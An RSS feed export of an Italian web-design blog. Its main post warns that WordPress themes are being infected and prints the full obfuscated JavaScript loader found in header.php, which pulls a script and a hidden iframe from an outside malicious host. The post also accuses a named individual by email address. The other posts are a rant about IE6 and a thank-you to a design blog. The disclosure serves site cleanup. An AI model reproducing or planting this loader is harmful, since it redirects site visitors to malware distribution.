BASIC TRADING MULTIMEDIA » Blogroll http://www.basictrading.biz Information Technology and Design Fri, 30 Jul 2010 14:38:29 +0000 en hourly 1 http://wordpress.org/?v=3.0.1 Virus nel tuo blog Worpress? http://www.basictrading.biz/2010/04/virus-nel-tuo-blog-worpress/ http://www.basictrading.biz/2010/04/virus-nel-tuo-blog-worpress/#comments Tue, 20 Apr 2010 15:42:54 +0000 Matteo Papadopoulos http://www.basictrading.biz/?p=244 Read More]]> C’è uno script, che si insidia nel tuo blog, ed è proprio un piccolo bastardello… alcuni antivirus lo riconoscono, altri no… se usi Linux o Mac, in cui facilmente non hai antivirus installati, potresti non accorgerti proprio… ma poi un cliente ti chiama, tu cerchi e ricerchi… e alla fine eccolo lì!

Però, usando firebug, capita di vedere che esiste una richiesta che parte per un sito, itsallbreaksoft.net

Bene, non si sa esattamente come questi cari signori riescano a scrivere sul file header.php del tema che avete impostato, ma li sta il danno.

troverete alla fine del tag </head> un bello script javascript:

<script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%264Dtdsjqu%264Fepdvnfou/xsjuf%2639%2633%264Dtdsjqu%2631tsd%264E%266D%2633%2633%2C%2633iuuq%264B00jutbmmcsfbltpgu/ofu0uet0jo/dhj%264G3%2637tfpsfg%264E%2633%2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%264E2%2637IUUQ%60SFGFSFS%264E%2633%2C%2631fodpefVSJDpnqpofou%2639epdvnfou/VSM%263%3A%2C%2633%2637efgbvmu%60lfzxpse%264Eopuefgjof%2633%2C%2633%266D%2633%264F%264D%266D0tdsjqu%264F%2633%263%3A%264C%264D0tdsjqu%264F%261B%264Dtdsjqu%264F%261Bjg%2639uzqfpg%2639i%263%3A%264E%264E%2633voefgjofe%2633%263%3A%268C%261%3A%261B%261%3Aepdvnfou/xsjuf%2639%2633%264Djgsbnf%2631tsd%264E%2638iuuq%264B00jutbmmcsfbltpgu/ofu0uet0jo/dhj%264G4%2637tfpsfg%264E%2633%2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%264E2%2637IUUQ%60SFGFSFS%264E%2633%2C%2631fodpefVSJDpnqpofou%2639epdvnfou/VSM%263%3A%2C%2633%2637efgbvmu%60lfzxpse%264Eopuefgjof%2638%2631xjeui%264E2%2631ifjhiu%264E2%2631cpsefs%264E1%2631gsbnfcpsefs%264E1%264F%264D0jgsbnf%264F%2633%263%3A%264C%2631%261B%268E%261Bfmtf%2631jg%2639i/joefyPg%2639%2633iuuq%264B%2633%263%3A%264E%264E1%263%3A%268C%261B%261%3A%261%3Axjoepx/mpdbujpo%264Ei%264C%261B%268E%261B%264D0tdsjqu%264F1')</script>

A questo punto è sufficiente cancellare lo script e assicurarsi di mettere il file header.php in sola lettura… rimane da scoprire come abiano fatto, se usano un particolare plugin falloso per accedervi o se è un bug di qualche versione di worpress. Sicurameten assicuratevi sempre di fare l’aggiornamento del vostro WP.

It turns out that the people behind this seem to be a pretty well-known group from Russia, with the main person being one Sergey Ryabov, who uses the email address director at climbing-games dot com. [Ed. Note: We'd love to talk with Mr. Ryabov, to learn more about his operations and how and why he's able to pull off this kind of hijinx.]

Ringrazio theinternetpatrol.com per la segnalazione

]]> http://www.basictrading.biz/2010/04/virus-nel-tuo-blog-worpress/feed/ 0 Ancora IE 6! e bastaaaaaaa!!!! http://www.basictrading.biz/2009/07/ancora-ie-6-e-bastaaaaaaa/ http://www.basictrading.biz/2009/07/ancora-ie-6-e-bastaaaaaaa/#comments Tue, 28 Jul 2009 15:31:05 +0000 Matteo Papadopoulos http://www.basictrading.biz/?p=191 Read More]]>

Che ancora, nel 2009, nell’era in cui il web 2.0 sta diventando vecchio, che ancora i webdesigners debbano trovarsi a fare i conti per Internet Explorer 6 (quando siamo ormai alla versione 8, quando esistono browser molto più veloci, affidabili), questo è lo trovo quantomeno assurdo. Stessimo poi parlando di software “costosi” potrei forse capire la questione “prezzo”, ma i browser si sa, sono gratuiti. Allora perchè le pubbliche amministrazioni, moltissimi clienti, e la stragande maggioranza del mondo continua ostinatamente ad utilizzare IE6? Perchè??!!

Ogni volta che pronuncio le magiche parole “me ne frego di IE6, se uno ce l’ha, si arrangia e vede male i siti” ecco che arriva un lavoro che richiede massima compatibilità con quel browser… la bestia!

SIX REVISION offre in questi giorni un ottimo articolo che descrive alcune vie per “hackare” i milioni di bug che la bestia ci propina da anni facendo lievitare enormente il numero delle ore spese per il codeing dei nostri siti.

Definitive Guide to Taming the IE6 Beast

]]> http://www.basictrading.biz/2009/07/ancora-ie-6-e-bastaaaaaaa/feed/ 0 Thank you, Six Revision http://www.basictrading.biz/2009/07/thank-you-six-revision/ http://www.basictrading.biz/2009/07/thank-you-six-revision/#comments Fri, 10 Jul 2009 11:55:42 +0000 Matteo Papadopoulos http://www.basictrading.biz/?p=189 Read More]]>
I do wish to thank who is taking care of the blog “SIX REVISION“; it’s a place where I can find lot of stuff, suggestions, tools, ideas ecc. for part of my job and the I believe that the best way to thanks them is to “promote them” directly from my website.

I will add an RSS feed to their site…

http://sixrevisions.com/

]]> http://www.basictrading.biz/2009/07/thank-you-six-revision/feed/ 0